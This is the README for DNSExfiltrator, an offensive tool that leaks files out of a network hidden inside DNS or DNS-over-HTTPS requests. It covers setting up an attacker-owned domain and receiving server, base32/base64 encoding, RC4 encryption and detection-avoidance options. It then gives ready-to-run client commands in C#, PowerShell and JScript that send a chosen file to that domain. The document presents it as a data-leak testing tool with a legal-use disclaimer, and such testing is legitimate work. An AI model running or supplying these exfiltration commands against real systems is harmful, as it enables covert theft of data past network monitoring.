Author: Arno0x0x - @Arno0x0x
DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
DNSExfiltrator has two sides:
dnsexfiltrator.py
), which acts as a custom DNS server, receiving the filednsExfiltrator.cs
: a C# script that can be compiled with csc.exe
to provide a Windows managed executableInvoke-DNSExfiltrator.ps1
: a PowerShell script providing the exact same functionnalities by wrapping the dnsExfiltrator assemblydnsExfiltrator.js
: a JScript script which is a conversion of the dnsExiltrator DLL assembly using DotNetToJScript, and providing the exact same functionnalitiesIn order for the whole thing to work you must own a domain name and set the DNS record (NS) for that domain to point to the server that will run the dnsexfiltrator.py
server side.
By default, DNSExfiltrator uses the system's defined DNS server, but you can also set a specific one to use (useful for debugging purposes or for running the server side locally for instance).
Alternatively, using the h
parameter, DNSExfiltrator can perform DoH (DNS over HTTP) using the Google or CloudFlare DoH servers.
By default, the data to be exfiltrated is base64URL encoded in order to fit into DNS requests. However some DNS resolvers might break this encoding (fair enough since FQDN are not supposed to case sensitve anyway) by messing up with the sensitivity of the case (upper or lower case) which is obviously important for the encoding/decoding process. To circumvent this problem you can use the -b32
flag in order to force Base32 encoding of the data, which comes with a little size overhead. If you're using CloudFlare DoH, base32 encoding is automatically applied.
DNSExfiltrator supports basic RC4 encryption of the exfiltrated data, using the provided password to encrypt/decrypt the data.
DNSExfiltrator also provides some optional features to avoid detection:
The only dependency is on the server side, as the dnsexfiltrator.py
script relies on the external dnslib library. You can install it using pip:
pip install -r requirements.txt
SERVER SIDE
Start the dnsexfiltrator.py
script passing it the domain name and decryption password to be used:
root@kali:~# ./dnsexfiltrator.py -d mydomain.com -p password
CLIENT SIDE
You can either use the compiled version, or the PowerShell wrapper (which is basically the same thing) or the JScript wrapper. In any case, the parameters are the same, with just a slight difference in the way of passing them in PowerShell.
1/ Using the C# compiled Windows executable (which you can find in the release
directory):
dnsExfiltrator.exe <file> <domainName> <password> [-b32] [h=google|cloudflare] [s=<DNS_server>] [t=<throttleTime>] [r=<requestMaxSize>] [l=<labelMaxSize>]
file: [MANDATORY] The file name to the file to be exfiltrated.
domainName: [MANDATORY] The domain name to use for DNS requests.
password: [MANDATORY] Password used to encrypt the data to be exfiltrated.
-b32: [OPTIONNAL] Use base32 encoding of data. Might be required by some DNS resolver break case.
h: [OPTIONNAL] Use Google or CloudFlare DoH (DNS over HTTP) servers.
DNS_Server: [OPTIONNAL] The DNS server name or IP to use for DNS requests. Defaults to the system one.
throttleTime: [OPTIONNAL] The time in milliseconds to wait between each DNS request.
requestMaxSize: [OPTIONNAL] The maximum size in bytes for each DNS request. Defaults to 255 bytes..
labelMaxSize: [OPTIONNAL] The maximum size in chars for each DNS request label (subdomain). Defaults to 63 chars.
2/ Using the PowerShell script, well, call it in any of your prefered way (you probably know tons of ways of invoking a powershell script) along with the script parameters. Most basic example:
c:\DNSExfiltrator> powershell
PS c:\DNSExfiltrator> Import-Module .\Invoke-DNSExfiltrator.ps1
PS c:\DNSExfiltrator> Invoke-DNSExfiltrator -i inputFile -d mydomain.com -p password -s my.dns.server.com -t 500
[...]
Check the EXAMPLES section in the script file for further usage examples.
3/ Using the JScript script, pass it the exact same arguments as you would with the standalone Windows executable:
cscript.exe dnsExiltrator.js inputFile mydomain.com password
Or, with some options:
cscript.exe dnsExiltrator.js inputFile mydomain.com password s=my.dns.server.com t=500
This tool is intended to be used in a legal and legitimate way only:
Quoting Empire's authors: There is no way to build offensive tools useful to the legitimate infosec industry while simultaneously preventing malicious actors from abusing them.